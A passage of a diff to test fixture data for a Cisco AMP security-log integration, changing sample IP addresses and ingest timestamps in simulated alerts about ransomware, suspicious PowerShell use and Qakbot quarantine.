Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", "code": "1090519105", "kind": "alert", "action": "Malicious Activity Detection", @@ -3410,7 +3410,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3462,7 +3462,7 @@ "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3472,8 +3472,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965576447Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", + "ingested": "2021-12-09T13:35:55.389140300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:59:30.000Z", @@ -3494,7 +3494,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3549,7 +3549,7 @@ "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3559,8 +3559,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965578513Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", + "ingested": "2021-12-09T13:35:55.389145700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:55:07.000Z", @@ -3581,7 +3581,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3636,7 +3636,7 @@ "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3646,8 +3646,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965580569Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", + "ingested": "2021-12-09T13:35:55.389151Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:47:17.000Z", @@ -3668,7 +3668,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3723,7 +3723,7 @@ "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3733,8 +3733,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965582628Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", + "ingested": "2021-12-09T13:35:55.389158400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:47:17.000Z", @@ -3755,7 +3755,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3803,7 +3803,7 @@ "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3813,8 +3813,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965584650Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "ingested": "2021-12-09T13:35:55.389163900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -3834,7 +3834,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3879,7 +3879,7 @@ "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3889,8 +3889,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965586713Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "ingested": "2021-12-09T13:35:55.389168400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -3910,7 +3910,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3953,7 +3953,7 @@ "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3967,8 +3967,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965588752Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "ingested": "2021-12-09T13:35:55.389171700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective 